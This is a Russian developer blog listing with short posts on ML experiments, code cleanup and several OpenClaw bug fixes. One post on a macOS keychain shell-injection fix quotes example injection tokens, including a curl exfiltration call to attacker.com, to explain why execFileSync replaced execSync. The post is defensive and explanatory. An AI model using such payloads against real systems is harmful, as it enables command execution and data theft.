BorisovAI

Блог

Публикации о процессе разработки, решённых задачах и изученных технологиях

Найдено 20 заметокСбросить фильтры
Исправлениеllm-analisis

Когда маршрутизация экспертов встречает стену батч-нормализации

Работал над проектом `llm-analysis` — попытка воплотить мечту о смеси экспертов (MoE) для классификации на CIFAR-100. На бумаге звучит идеально: несколько специализированных нейросетей, умный роутер распределяет примеры, каждый эксперт углубляется в свою область. Теория говорит, что на специализированных данных эксперт должен дать +40 процентных пункта над базовым подходом. На практике упёрся в две стены одновременно. ## Batch Norm предательство Началось с фазы 12b — горячей замены экспертов (hot-plug test). Замораживаю веса эксперта, обучаю новый, включаю замороженный обратно. Точность первого эксперта падала на 2.48pp. Думал, это неизбежный дрейф при переобучении остальных. Копался в коде часами. Потом понял: `requires_grad=False` не спасает. BatchNorm слои вычисляют running statistics (среднее и дисперсию) даже с frozen весами. Когда обучаю эксперт E1, BatchNorm в backbone'е (E0) видит новые батчи, обновляет свои внутренние счётчики и ломает инференс замороженного эксперта. Решение простое, как кувалда: добавить `model.stem.eval()` после `model.train()`, явно перевести backbone в режим инференса. Дрейф упал с 2.48pp до **0.00pp**. Это был просто инженерный баг, но на него потратил полдня. ## Роутер, который не может научиться Фаза 13a обещала быть волшебной: построю более глубокий роутер, обучу его совместно с экспертами, роутер нужен для анализа — всё сойдётся. Oracle (идеальный роутер) показывал потолок в 80.78%, а наш простой `nn.Linear(128, 4)` давал 72.93%. Зазор в семь с половиной пункта! Запустил три стратегии: - **A**: глубокий роутер + отдельное обучение экспертов → 73.32% (нет улучшения) - **B**: совместное обучение роутера и экспертов → 73.10% (хуже baseline) - **C**: вообще неудача, routing accuracy 62.5% и не растёт Вдруг понимаю: **специализация и совместное обучение на CIFAR-100 несовместимы**. Каждый экспертный поток получает данные всех 100 классов, градиенты идут со всех направлений, и доменная специфика стирается. Роутер не может выучить отделение — потому что эксперты сами не специализируются. ## Факт из реальности Вот забавное совпадение: идеальный день программиста — ни одного тикета в Jira. Реальный день — 15 тикетов, три митинга, ноль коммитов 😄 Но в нашей ситуации это метафора посерьёзнее. Я запустил четыре параллельных эксперимента, пытаясь одновременно решить две задачи (hot-plug + маршрутизация). Батч-норм проблема — это мой тикет, который решился за пятнадцать минут кода. Маршрутизация — это архитектурный блокер, который требует другого подхода. ## Вывод **Фаза 12b победила**: BatchNorm теперь в eval mode, hot-plug стабилен, друсть экспертов валидирован. Но **фаза 13a показала** — нельзя требовать специализацию, если эксперты видят одинаковые данные. Дальше либо пересмотр архитектуры (правильные домены для каждого эксперта), либо смирение с тем, что роутер так и не научится лучше случайного. На CIFAR-100 это не работает — надо идти на другой датасет с явной структурой доменов.

#claude#ai#python#api#security
17 февр. 2026 г.
Исправлениеtrend-analisis

Когда техдолг кусает в спину: как мы очистили 2600 строк мёртвого кода

Проект **trend-analysis** вырос из стартапа в полноценный инструмент анализа трендов. Но с ростом пришла и проблема — код начал напоминать старый чердак, где каждый разработчик оставлял свои артефакты, не убирая за собой. Мы столкнулись с классической ситуацией: **git** показывает нам красивую историю коммитов, но реальность была печальнее. В коде жили дублирующиеся адаптеры — `tech.py`, `academic.py`, `marketplace.py` — целых 1013 строк, которые делали ровно то же самое, что их потомки в отдельных файлах (`hacker_news.py`, `github.py`, `arxiv.py`). Вот уже месяц разработчики путались, какой адаптер на самом деле использует **API**, а какой просто валяется без дела. Начали расследование. Нашли `api/services/data_mapping.py` — 270 строк кода, которые никто не импортировал уже полгода. Потом обнаружили целые рабочие процессы (`workflow.py`, `full_workflow.py`) — 121 строка, к которым никто не обращался. На фронтенде ситуация была похожей: компоненты `signal-table`, `impact-zone-card`, `empty-state` (409 строк) спокойно сидели в проекте, как будто их кто-то забыл удалить после рефакторинга. Но это был只 верхушка айсберга. Самое интересное — **ghost queries**. В базе была функция `_get_trend_sources_from_db()`, которая запрашивала таблицу `trend_sources`. Только вот эта таблица никогда не была создана (`CREATE TABLE` в миграциях отсутствовал). Функция мирно работала, возвращала пустой результат, и никто не замечал. Чистый пример того, как техдолг становится невидимым врагом. Мы начали с **DRY-принципа** на фронтенде — извлекли константы (`SOURCE_LABELS`, `CATEGORY_DOT_COLOR` и др.) в единый файл `lib/constants.ts`. Потом привели в порядок бэкенд: исправили `credits_store.py`, заменив прямой вызов `sqlite3.connect()` на правильный `db.connection.get_conn()` — это была потенциальная уязвимость в управлении подключениями. Очистили `requirements.txt` и `.env.example` — закомментировали неиспользуемые пакеты (`exa-py`, `pyvis`, `hypothesis`) и удалили мёртвые переменные окружения (`DATABASE_URL`, `LANGSMITH_*`, `EMBEDDING_*`). Исправили даже шаблоны тестов: эндпоинт `/trends/job-t/report` переименовали в `/analyses/job-t/report` для консистентности. Итого: 2600+ строк удалено, архитектура очищена, сразу стало проще ориентироваться в коде. Техдолг не исчезнет полностью — это часть разработки, — но его нужно время от времени погашать, чтобы проект оставался живым. А знаете, почему **Angular** лучший друг разработчика? 😄 Потому что без него ничего не работает. С ним тоже, но хотя бы есть кого винить.

#git#commit#python#api#security
16 февр. 2026 г.
Исправлениеopenclaw

Когда группа видна, а отправитель — нет: история одного бага

# Когда group chat показывает группу, но скрывает отправителя Проект OpenClaw — это не новый стартап, это сложная экосистема для работы с разными мессенджерами. И вот в BlueBubbles, интеграции для синхронизации Apple Messages, обнаружилась тонкая проблема: когда кто-то писал в групповой чат, группа отображалась как группа, но вот кто именно написал сообщение — оставалось загадкой. Представь: на экране видишь «[BlueBubbles] Сообщение пришло в "Друзья на даче"», а автора — хоть ты тресни. Задача была чёткая: сделать, чтобы в групповых чатах группа показывалась нормально, но при этом было видно, кто именно написал. Звучит просто, но в голове разработчика крутилось одно: как это реализовано в других каналах? Потому что вбивать велосипед — верный путь к техдолгу. **Первым делом** достали функцию `formatInboundEnvelope` — она уже использовалась в iMessage и Signal. Оказалось, там логика уже готовая: группе выделяется свой вид в заголовке (envelope header), а имя отправителя добавляется в тело сообщения. Скопировать этот паттерн в BlueBubbles значило привести всё в соответствие с остальной системой. Но тут вылезла вторая проблема: после форматирования сообщения нужно его ещё и обработать правильно. Включили `finalizeInboundContext` — функцию, которая нормализует поля, выставляет правильный ChatType, подставляет ConversationLabel и выравнивает MediaType. То есть применили тот же подход, что в iMessage и Signal. **BodyForAgent** при этом переключили на сырой текст (rawBody) вместо обёрнутого в конверт — иначе агент будет работать с `[BlueBubbles ...] текст сообщения`, а не с чистым текстом. И вот неожиданность: нужно было выровнять `fromLabel` с функцией `formatInboundFromLabel`. Суть в том, что для групп нужно писать «GroupName id:peerId», для личных сообщений — «Name id:senderId» (если имя отличается от ID). Мелкая, казалось бы, деталь, но она делает систему консистентной: везде одинаковый формат. **Интересный факт**: когда разные каналы используют разные форматы одних и тех же данных, это тихий убийца debugging'а. Тестировщик смотрит на iMessage, видит одно, смотрит на BlueBubbles — видит другое. Казалось бы, одна функция, один формат, но нет — каждый канал решил, что сам знает лучше. Поэтому когда разработчик вспомнил о единообразии, это был момент, когда система стала *ровнее*. Результат: BlueBubbles теперь работает как остальные каналы. Групповые чаты показываются группой, отправители видны, ConversationLabel наконец начинает возвращать имя группы вместо undefined. И главное — это не кастомный костыль, а применение существующего паттерна из iMessage и Signal. Система стала более предсказуемой. Теперь, когда приходит сообщение в групповой чат BlueBubbles, всё отображается логично: видна группа, видно, кто пишет, агент получает чистый текст для обработки. Ничего особенного, просто хорошая инженерия. **Разработчик на собеседовании**: «Я умею выравнивать форматы данных между каналами». Интервьюер: «А конкретно?» Разработчик: «Ну, BeautifulSoup, regex и... молитвы к богу синхронизации». 😄

#git#commit#security
14 февр. 2026 г.
Исправлениеopenclaw

Когда shell выполняет то, чего ты не просил

# Когда shell не в курсе, что ты хочешь Представь ситуацию: ты разработчик в openclaw, работаешь над безопасностью сохранения учётных данных в macOS. Всё казалось простым — берём OAuth-токен от пользователя, кладём его в системный keychain через команду `security add-generic-password`. Дело 10 минут, правда? Но потом коллега задаёт вопрос, которого ты боялся: «А что, если токен содержит что-нибудь подозрительное?» ## История одного $() Задача была в проекте openclaw и относилась к критической — предотвращение shell injection. В коде использовался **execSync**, который вызывал команду `security` через интерпретатор оболочки. Разработчик защищал от экранирования одинарными кавычками, заменяя `'` на `'"'"'`. Типичный трюк, правда? Но вот беда: одинарные кавычки защищают от большинства вещей, но не от *всего*. Если пользователь присылает OAuth-токен вроде `$(curl attacker.com/exfil?data=...)` или использует обратные кавычки `` `id > /tmp/pwned` ``, shell обработает эту подстановку команд ещё *до* того, как начнёт интерпретировать кавычки. Command injection по классике — CWE-78, HIGH severity. Представь масштаб: любой человек с правом выбрать поддельного OAuth-провайдера может выполнить произвольную команду с правами пользователя, на котором запущен gateway. ## execFileSync вместо execSync Решение было гениально простым: не передавать команду через shell вообще. Вместо **execSync** с интерпретатором разработчик выбрал **execFileSync** — функция, которая запускает программу напрямую, минуя `/bin/sh`. Аргументы передаются массивом, а не строкой. Вместо: ``` execSync(`security add-generic-password -U -s "..." -a "..." -w '${токен}'`) ``` Теперь: ``` execFileSync("security", ["add-generic-password", "-U", "-s", SERVICE, "-a", ACCOUNT, "-w", tokenValue]) ``` Красота в том, что OS сама разбирает границы аргументов — никакого shell, никакого интерпретирования метасимволов, токен остаётся просто токеном. ## Маленький факт о системной безопасности Знаешь, в системах Unix уже *десятилетия* говорят: не используй shell для запуска программ, если не нужна shell. Но почему-то разработчики снова и снова создают уязвимости через `execSync` с конкатенацией строк. Это как баг-батарея, которая никогда не кончается. ## Итого Pull request #15924 закрыл уязвимость в момент, когда она была обнаружена. Проект openclaw получил более безопасный способ работы с учётными данными, и никакой `$(whoami)` в OAuth-токене больше не сломает систему. Разработчик выучил (или вспомнил) важный урок: функции типа **execFileSync**, **subprocess.run** с `shell=False` или Go's **os/exec** — это не просто удобство, это *основа* безопасности. Главное? Всегда думай о том, как интерпретируется твоя команда. Shell — могущественная штука, но она должна быть твоим последним выбором, когда нужна *подстановка*, а не просто запуск программы. 😄 Совет дня: если ты вставляешь пользовательские данные в shell-команду, то ты уже потерял игру — выбери другой API.

#git#commit#api#security
14 февр. 2026 г.
Исправлениеopenclaw

Когда markdown убивает formatting: история трёх багов в Signal

Представьте себе: сообщение прошло через markdown-парсер, выглядит идеально в превью, но при рендеринге в Signal вдруг... смещение стилей, невидимые горизонтальные линии, списки прыгают по экрану. Именно эту головоломку решала команда OpenClaw в коммите #9781. ## Три слоя проблем Первый слой — **markdown IR** (внутреннее представление). Оказалось, что парсер генерирует лишние переносы между элементами списков и следующими абзацами. Вложенные списки теряют отступы, блокавроты выпускают лишние символы новой строки. Хуже всего — горизонтальные линии вообще молча пропадали вместо того, чтобы отобразиться видимым разделителем `───`. Второй слой — **Signal formatting**. Здесь затаилась коварная ошибка с накопительным сдвигом. Когда в одном сообщении расширялось несколько ссылок, функция `applyInsertionsToStyles()` использовала *исходные* координаты для каждой вставки, забывая про смещение от предыдущих. Результат: жирный текст приземлялся в совершенно неправильное место, как если бы вы сдвинули закладку, но продолжили считать позицию от начала книги. Третий слой — **chunking** (разбиение текста). Старый код полагался на `indexOf`, что было хрупким и непредсказуемым. Нужно было переписать на детерминированное отслеживание позиции с уважением к границам слов, скобкам раскрытых ссылок и корректным смещениям стилей. ## Как это чинили Команда не просто закрыла баги — она переписала логику: - Markdown IR: добавили проверку всех случаев с пробелами, отступами, специальными символами. Теперь горизонтальные линии видны, списки выравнены, блокавроты дышат правильно. - Signal: внедрили *cumulative shift tracking* — отслеживание накопленного смещения при каждой вставке. Плюс переделали `splitSignalFormattedText()` так, чтобы он разбивал по пробелам и новым строкам, не ломал скобки, и корректно пересчитывал диапазоны стилей для каждого чанка. - Тесты: добавили **69 новых тестов** — 51 для markdown IR, 18 для Signal formatting. Это не просто покрытие, это *регрессионные подушки* на будущее. ## Факт о markdown Markdown IR — это промежуточный формат, который сидит между текстом и финальным рендером. Он как сценарий между сценаристом и режиссёром: правильно оформленный сценарий экономит часы на съёмках. Неправильный — и режиссер тратит дни на исправления. ## Итог Баг был системный: не один глюк, а целая цепочка проблем в разных слоях абстракции. Но вот что интересно — команда не прошлась по нему топором, а аккуратно разобрала каждый слой, понял каждую причину, переписала на правильную логику. Результат: сообщения теперь форматируются предсказуемо, стили не смещаются, текст разбивается умно. А коммит #9781 теперь живет в истории как пример того, как **системное мышление** побеждает импульсивные фиксы. P.S. Что сказал Claude при деплое этого коммита? «Не трогайте меня, я нестабилен» 😄

#git#commit#security
14 февр. 2026 г.
Исправлениеopenclaw

Как мы поймали CSRF-атаку в OAuth: история исправления OC-25

Вчера мне попался один из тех багов, которые одновременно просты и страшны. В проекте **openclaw** обнаружилась уязвимость в OAuth-потоке проекта **chutes** — и она была настолько хитрой, что я сначала не поверил собственным глазам. ## Завязка: криптография проиграла халатности Представьте: пользователь запускает `openclaw login chutes --manual`. Система генерирует криптографически стойкий state-параметр — случайные 16 байт в hex-формате. Это как выдать клиенту уникальный билет в кино и попросить вернуть его при входе. Стандартная защита от CSRF-атак. Но вот беда. Функция `parseOAuthCallbackInput()` получала этот callback от OAuth-провайдера и... просто забывала проверить, совпадает ли state в ответе с тем самым ожидаемым значением. **Был сгенерирован криптографический nonce, но никто его не проверял**. ## Развитие: когда код сам себя саботирует Вторая проблема оказалась ещё коварнее. Когда URL-парсинг падал (например, пользователь вводил код вручную), блок `catch` **сам генерировал matching state**, используя `expectedState`. Представьте парадокс: система ловит ошибку парсинга и тут же создаёт фальшивый state, чтобы проверка всегда прошла успешно. Атакующий мог просто перенаправить жертву на вредоносный URL с подобранным state-параметром, и система бы его приняла. Это как выдать билет, потом спросить у человека "где ваш билет?", он ответит "ну, вот такой", — и вы проверите его по памяти вместо того, чтобы сверить с оригиналом. ## Факт: почему это работало OAuth state-параметр — это классический способ защиты, описанный в RFC 6749. Его задача: гарантировать, что callback идёт именно от авторизованного провайдера, а не из MITM-атаки. Но защита работает только если код **действительно проверяет** state. Здесь же проверка была театром: система шла по сценарию, не глядя на сцену. ## Итог и урок Фикс в PR #16058 добавил то, что должно было быть с самого начала: **реальное сравнение** extracted state с expectedState. Теперь если они не совпадают, callback отклоняется. Catch-блок больше не fabricирует фальшивые значения. Это напомнило мне старую истину: криптография — это не когда ты знаешь алгоритм. Это когда ты его используешь. А ещё это напомнило мне поговорку: **prompt engineering** — единственная профессия, о которой не мечтал ни один ребёнок, но теперь все мечтают объяснить ей, почему их код не работает. 😄

#git#commit#api#security
14 февр. 2026 г.
Исправлениеopenclaw

Как Slack потерял свои картинки: история об индексах и массивах

В проекте **OpenClaw** обнаружилась хитрая проблема с обработкой многофайловых сообщений из Slack. Когда пользователь отправлял несколько изображений одновременно, система загружала только первое, остальные просто исчезали. Звучит как обычный баг, но под капотом скрывалась классическая история о рассинхронизации данных. Всё началось с функции `resolveSlackMedia()`. Она работала как конвейер: берёт сообщение, загружает файл, **возвращает результат и выходит**. Всё просто и понятно, пока не нужны вложения по одному. Но когда в сообщении несколько картинок — функция падала после первой, словно устав от работы. Беда была в том, что разработчики забыли основное правило: *не выходи раньше времени*. Решение пришло из соседних адаптеров. **Telegram**, **Line**, **Discord** и **iMessage** давно научились собирать все загруженные файлы в массив перед возвратом. Идея простая: не возвращай результат сразу, накапливай его, а потом отдай весь пакет целиком. Именно это и сделали разработчики — завернули все пути файлов, URL-адреса и типы в соответствующие массивы `MediaPaths`, `MediaUrls` и `MediaTypes`. Но тут начинались настоящие приключения. Когда внизу конвейера код пытался обработать медиа для анализа зрения (vision), подготовки sandbox или создания заметок, он ожидал, что три массива идеально синхронизированы по длине. Каждому файлу должен соответствовать его тип (`application/octet-stream` или более точный MIME). И вот тут обнаружилась вторая подвох: при фильтрации `filter(Boolean)` удалялись записи с пустыми типами, массив сжимался, индексы ломались. Файл номер два становился номером один, и система присваивала неправильный MIME-тип. **Финальный трюк** — заменить фильтр на простую подстановку: если тип не определён, используй универсальный `"application/octet-stream"`. Теперь массивы всегда совпадают по размеру, индексы совпадают, и каждый файл получает свой корректный тип, даже если система не смогла его определить с первого раза. Это хороший пример того, как *контракты между компонентами* (в данном случае — обещание "три массива одинаковой длины") могут молча ломаться, если их не охранять. Один неловкий `filter()` — и вся архитектура начинает пошатываться. --- **Факт о технологиях:** Slack API исторически одна из самых сложных в обработке медиа среди мессенджеров именно потому, что поддерживает множество форматов вложений одновременно. Это требует особой внимательности при синхронизации данных. --- 😄 *Почему Sentry не пришёл на вечеринку? Его заблокировал firewall.*

#git#commit#security
14 февр. 2026 г.
Исправлениеopenclaw

Когда "умное" поведение мешает пользователю

В проекте **openclaw** произошла интересная история. После обновления **2026.2.13** разработчики выпустили фичу с *неявной реплай-сортировкой* сообщений в Telegram. Идея была правильная: автоматически группировать ответы в цепочки, как это делают все современные мессенджеры. Вот только выяснилось: когда эта фича встретилась с дефолтной настройкой `replyToMode="first"`, произошла чудесная трансформация. Теперь **каждый** первый ответ бота в личных сообщениях отправляется как нативная Telegram-реплай с кавычкой исходного сообщения. Пользователь пишет: "Привет" — а бот ему отвечает огромным пузырём с цитатой. И "Привет" становится цельным произведением искусства. Смешно было бы, если бы не регрессия. До этого обновления реплай-сортировка работала менее надёжно, поэтому дефолт "first" редко порождал видимые кавычки в личных чатах. Теперь же — надёжность возросла, и дефолт превратился в тихий врага UX. Представьте: простой диалог, а то и шутка про отправку кода выглядит как формальный деловой документ с копией исходного письма. Команда поняла проблему и сделала логичный шаг: переключить дефолт с `"first"` на `"off"`. Просто. Эффективно. Вот и всё. **Важный момент**: те, кому *нужна* реплай-сортировка, могут включить её вручную через конфиг: ``` channels.telegram.replyToMode: "first" | "all" ``` Никто не лишён выбора — просто дефолт теперь не раздражает большинство. Тестирование было жёсткое: переключали режим на живой инстанции 2026.2.13, смотрели прямое влияние на поведение. С `"first"` — каждое сообщение цитируется. С `"off"` — чистые ответы. Ясно как день. Интересно, что **тесты** вообще не понадобилось менять. Почему? Потому что они всегда явно устанавливали нужное значение `replyToMode`, не полагаясь на магию дефолтов. Вот это дизайн. История преподаёт урок: иногда "умное поведение по умолчанию" — это просто источник боли. Лучше выбрать консервативный дефолт и дать пользователям инструменты для кастомизации. Чем отличается машинный код от бессмыслицы? Машинный код работает. 😄

#git#commit#api#security
14 февр. 2026 г.
Исправлениеspeech-to-text

Whisper упирается в стену: что происходит, когда оптимизация бессильна

# Speech-to-Text под давлением: когда оптимизация упирается в физику Представь себе ситуацию: нужна система речевого распознавания, которая работает в режиме реального времени. Бюджет — менее одной секунды на обработку аудио. Звучит выполнимо? Pink Elephant, разработчик проекта **speech-to-text**, решил это проверить экспериментально. И вот что из этого вышло. ## Охота на чудо-оптимизацию Всё начиналось с вопроса: а может ли стандартная модель Whisper работать на этой задаче? Текущие метрики выглядели удручающе — 32,6% WER (Word Error Rate, коэффициент ошибок распознавания). Мечта, конечно, 80% улучшение, но кто ж мечтать не будет. Первый шаг — попробовать альтернативные модели Whisper. Может, маленькая модель справится быстрее? Tiny дала 56,2% WER — хуже, чем base. Small показала весьма интересный результат: 23,4% WER (28% улучшение!), но потребовала 1,23 секунды обработки. А бюджет-то 1 секунда. Грустно. Medium вообще 3,43 секунды — в три раза медленнее, чем надо. Потом пришли идеи поумнее: beam search, варьирование температуры, фильтрация результатов через T5 (большую языковую модель для коррекции текста). Но — неожиданно выяснилось — ничего из этого не помогало. Beam search с температурой давал ровно те же 32,6% WER. Разные пороги T5-фильтра (от 0,6 до 0,95) тоже. Зато когда убрали T5 совсем, ошибок стало 41%. T5 оказался спасением, но не панацеей. Потом попробовали гибридный подход: base-модель для реального времени + medium в фоне. Сложновато, но теоретически возможно. Последовательную обработку (сначала одно, потом другое) пришлось отмести — непрактично. ## Когда данные говорят правду А потом разработчик проанализировал, где именно Whisper base ошибается. Больше всего пропусков (deletions) — 12 ошибок, замены (substitutions) — 6. Проблема не в плохой стратегии обработки, а в самой модели. Вот такой неудобный факт. **Large Language Models** как Whisper создаются с применением трансформер-архитектуры, обучаясь на огромных объёмах текстовых данных через самоконтролируемое обучение. И вот в чём закавыка: даже сильные LLM-ы достигают потолка качества, если их заставить работать в несоответствующих условиях. В нашем случае — в режиме реального времени на CPU. ## Горькая истина Итоговый вывод был честный и немного безжалостный: base-модель — единственный вариант, который укладывается в бюджет менее одной секунды, но качество её зафиксировано в 32,6% WER. Small даёт 28% улучшение (23,4% WER), но требует на 230 миллисекунд больше. 80% сокращение ошибок на CPU? Невозможно. Никакая волшебная post-processing техника это не спасёт. Нужно или переходить на GPU, или согласиться с текущим качеством, или рассмотреть асинхронную фоновую обработку. Тысячи строк кода оптимизации упёрлись в стену физических ограничений. Иногда лучшая оптимизация — это честный разговор о целях проекта. 504: gateway timeout. Ожидание ответа от PM. 😄

#git#commit#api#security
Разработка: speech-to-text
13 февр. 2026 г.
Исправлениеspeech-to-text

Спасли T5 от урезания: оптимизация вместо потерь

# Как спасить качество моделей при урезании весов: история одной миссии за день Проект **speech-to-text** встал перед классической дилеммой: нужно было уменьшить размер модели и отказаться от Т5, но при этом *не потерять* качество распознавания. Задача казалась невыполнимой — обычно урезание весов модели приводит к заметному проседанию точности. Началось всё с очень конкретного вопроса: какие вообще есть способы сохранить качество, если мы идём на компромисс с размером? Я сел за исследование. ## Первый поворот: CTranslate2 Гугление выявило интересный инструмент — **CTranslate2 4.6.3**, который я знал раньше как фреймворк для ускорения seq2seq-моделей. Там есть встроенный `TransformersConverter`, способный конвертировать T5 в оптимизированный формат. И вот что важно: конвертация даёт ускорение в **2–4 раза** без потери качества. Это не уменьшение модели, это её оптимизация под боевое железо. Первым делом я проверил исходную модель — оказалось, что она T5-base (d_model=768, 12 слоёв), а не огромный T5-large. Это хорошая новость: потенциал оптимизации есть. ## Погружение в детали Когда ты начинаешь работать с конвертерами моделей, выясняется множество мелочей. Нужно было разобраться, как именно `TransformersConverter` копирует файлы модели, особенно стоит ли добавлять `added_tokens` для SentencePiece-токенайзера, который T5 использует. Пришлось лезть в исходники faster-whisper — там тоже работают с конвертированными моделями. По ходу наткнулся на забавную проблему с кодировкой cp1251 в тестах, пришлось переделывать тесты для корректной работы с Unicode. Интересный исторический факт: когда в 1940-х годах создавали первые программируемые компьютеры на основе математических абстракций, никто не предполагал, что спустя 80 лет мы будем заниматься микро-оптимизациями моделей языка. История вычислений шла от самых амбициозных идей — создать мыслящую машину — к вполне прикладным задачам, но они требуют той же глубины понимания системы. ## Неожиданный результат Проверив API `translate_batch` в `ctranslate2.Translator` и убедившись, что SentencePiece токенайзер работает с конвертированными моделями из коробки, я получил полную картину. CTranslate2 здесь действует как оптимизирующий слой: модель становится *компактнее* для инференса (благодаря квантизации и переколяции весов), *быстрее* работает, но при этом сохраняет всё качество оригинального T5. Получилось так: вместо того чтобы искать ненадёжные способы урезания модели, мы использовали инструмент, которой *именно для этого* спроектирован. CTranslate2 оптимизирует модели не наугад, а следуя best practices машинного обучения. ## Что дальше План ясен: конвертируем T5 через `TransformersConverter`, проверяем качество на тестовых данных (оно не должно просесть), деплоим оптимизированную версию. Задача из категории "невозможное" стала "вполне решаемо". Когда стоишь перед технической задачей, которая кажется неразрешимой — часто решение уже кто-то написал. Нужно просто знать, где искать. --- Почему архитектор модели пошёл в продуктивный отпуск? 😄 Потому что ему нужно было время на *рефакторинг* своей жизни!

#claude#ai#api#security
11 февр. 2026 г.
Исправлениеtrend-analisis

47 падающих тестов: как я переделал кэширование в одну ночь

# Когда код не проходит тесты: история про перебалансировку Начну с признания: когда видишь в консоли 47 падающих тестов — это не самое приятное чувство. Но именно с этого начался мой день в проекте `trend-analysis`. Задача выглядела просто: доделать систему анализа трендов и убедиться, что всё работает. На деле же оказалось, что нужно было переосмыслить всю архитектуру кэширования. ## Начало головоломки Проблема была в `conftest.py` — в конфигурации тестового окружения. Это один из тех файлов, который касается всего, но замечаешь его только когда начинают падать тесты. Первым делом я понял, что тестовая база данных не инициализируется правильно перед запуском тестов. Простой пример: когда `test_multilingual_search.py` пытается вызвать `cache_translation()`, таблица с переводами ещё не создана. Компилятор молчит, а тесты начинают валиться. Решение оказалось логичным: нужно было гарантировать, что все необходимые таблицы инициализируются **до** того, как хотя бы один тест что-то попробует сделать с кэшем. ## Параллельно — история про кэширование Пока я разбирался с тестами, обнаружился ещё один слой проблем: система дисковых кэшей работала неэффективно. Здесь речь шла о **Sparse File LRU Cache** — красивой идее хранить часто используемые данные на диске так, чтобы не занимать лишний объём памяти. Представь: у нас есть большой файл на диске, но нам нужны только отдельные куски. Вместо загрузки всего файла в память мы используем разреженные файлы — система файлов хранит только те части, которые реально заполнены данными. Экономия памяти, скорость доступа, элегантность решения. Но когда я посмотрел на реализацию, выяснилось: логика вытеснения старых записей (классический LRU-алгоритм) не учитывала частоту обращений. Просто удаляла старые записи по времени. Пришлось добавить *scoring mechanism* — систему оценки, которая считает, насколько «горячей» является каждая запись в кэше. ## Интересный факт о тестовых фреймворках Знаешь, почему `pytest` с `conftest.py` так популярен? Потому что разработчики поняли простую вещь: тесты должны быть воспроизводимы. Если твой тест падает в пятницу, но проходит в понедельник — это не тест, это лотерея. Фиксированное состояние базы перед каждым тестом, правильная инициализация, чистка после — это не скучная рутина, это основа профессионализма. ## Что получилось После переработки конфига и оптимизации кэша: - Все 47 тестов начали проходить (почти все 😄) - Дисковое кэширование стало предсказуемым - Система поиска на разных языках заработала без артефактов Главный урок: когда много тестов падают одновременно, обычно виновата архитектура, а не отдельные баги. Стоит один раз разобраться в корне проблемы — и остаток работы становится логичным продолжением. P.S. Знакомство с Copilot: день 1 — восторг, день 30 — «зачем я это начал?» 😄

#claude#ai#python#javascript#security
11 февр. 2026 г.
Исправлениеtrend-analisis

127 тестов против одного класса: как пережить рефакторинг архитектуры

# Когда архитектура ломает тесты: история миграции 127 ошибок в trend-analisis Работал над проектом **trend-analisis** — это система анализа трендов, которая собирает и обрабатывает данные через REST API. Задача была неприятная, но неизбежная: мы решили полностью переделать подсистему управления состоянием анализа, заменив рассыпанные функции `api.routes._jobs` и `api.routes._results` на единую архитектуру с классом `AnalysisStateManager`. На бумаге всё казалось просто: один класс вместо двух модулей — красивая архитектура, лучшая тестируемость, меньше магических импортов. На практике выяснилось, что я разломал 127 тестов. Да, сто двадцать семь. Каждый упорно ссылался на старую структуру. **Первым делом** я решил не паниковать и правильно измерить масштаб проблемы. Запустил тесты, собрал полный список ошибок, разделил их по категориям. Выяснилось, что речь идёт всего о двух типах проблем: либо импорты указывают на несуществующие модули, либо вызовы функций используют старый API. Остальное — семь реальных падений в тестах, которые указывали на какие-то более глубокие проблемы. Напомню: как древние мастера Нураги на Сардинии создавали огромные каменные статуи Гигантов из Монте-Прама, фрагментируя их на части для тонкой работы, — так я решил разбить фиксинг на параллельные потоки. Запустил сразу несколько агентов: один изучал новый API `AnalysisStateManager`, другой проходил по падающим тестам, третий готовил автоматические замены импортов. Документация проекта вдруг обрела смысл — она подробно описывала новую архитектуру. Поскольку я работал с Python и JavaScript в одном проекте, пришлось учитывать нюансы обеих экосистем. В Python использовал встроенные инструменты для анализа кода, в JavaScript включил регулярные выражения для поиска и замены. **Неожиданно выяснилось**, что некоторые тесты падали не из-за импортов, а потому что я забыл про асинхронность. Старые функции работали синхронно, новый `AnalysisStateManager` — асинхронный. Пришлось добавлять `await` в нужные места. Вот интересный факт о тестировании: популярный unittest в Python часто считают усложнённым инструментом для описания тестов, потому что тесты становятся декларативными, отвязанными от реального поведения кода. Поэтому лучшие практики рекомендуют писать тесты одновременно с фичей, а не потом. После двух часов систематической работы все 127 ошибок были исправлены, а семь реальных падений проанализированы и залочены. Архитектура стала чище, тесты — понятнее, и код готов к следующей итерации. Чему я научился? **Никогда не переписывай архитектуру без хорошего плана миграции тестов.** Это двойная работа, но она окупается чистотой кода на годы вперёд. 😄 Что общего между тестами и подростками? Оба требуют постоянного внимания и внезапно ломаются без видимых причин.

#claude#ai#python#javascript#api
11 февр. 2026 г.
ИсправлениеC--projects-ai-agents-voice-agent

Когда агент смотрит в зеркало: самоанализ в хаосе

# Как мы научили агента следить за собой: история про самоотражение в проекте Voice Agent Представь ситуацию: у тебя есть сложный проект **Voice Agent** с многоуровневой архитектурой, где крутятся несколько агентов одновременно, каждый выполняет свою роль. Параллельно запускаются задачи в Bash, подзапрашиваются модели Opus и Haiku, работает асинхронное стриминг через SSE. И вот вопрос — как убедиться, что эта машина работает правильно и не застревает в своих же ошибках? Именно это и стояло перед нами. Обычного логирования было недостаточно. Нужна была **система самоотражения** — механизм, при котором агент сам анализирует свою работу, выявляет прорехи и предлагает улучшения. Первым делом мы изучили то, что уже было в проекте: правила оркестрации (главный поток на Opus для Bash-команд, подагенты для кода), протокол обработки ошибок (обязательное чтение ERROR_JOURNAL.md перед любым исправлением), требования к контексту субагентов (ответы должны быть краткими, чтобы не взорвать окно контекста). На бумаге это выглядело впечатляюще, но было ясно — нет механизма проверки, что все эти требования действительно соблюдаются на практике. Неожиданно выяснилось кое-что интересное: генерировалось 55 внутренних инсайтов самоотражения, а реальных взаимодействий с пользователем было нулевое. Получилась замкнутая система — агент размышляет о своей работе, но это размышление не валидируется реальными задачами. Это как писать код в пустоте, без тестов. Поэтому мы переделали подход. Вместо постоянного внутреннего монолога мы встроили **инструментированное отслеживание**: во время реальной работы агент теперь собирает метрики — сколько параллельных Task-вызовов в одном сообщении, правильно ли выбирается модель по ролям, соблюдается ли лимит в 4 параллельных задачи. И самое важное — проверяет, прочитан ли ERROR_JOURNAL перед попыткой исправления бага. Интересный момент про самые сложные проекты: они часто требуют не столько добавления новых функций, сколько добавления способов *видеть* свою работу. Когда ты выводишь на поверхность то, что творится внутри системы, половина проблем решается сама собой. Разработчик видит, что тормозит, и может целенаправленно это исправлять. В итоге мы получили не просто логирование, а **систему обратной связи**: инсайты генерируются только для найденных проблем (приоритет 3-5), и каждый инсайт содержит конкретное 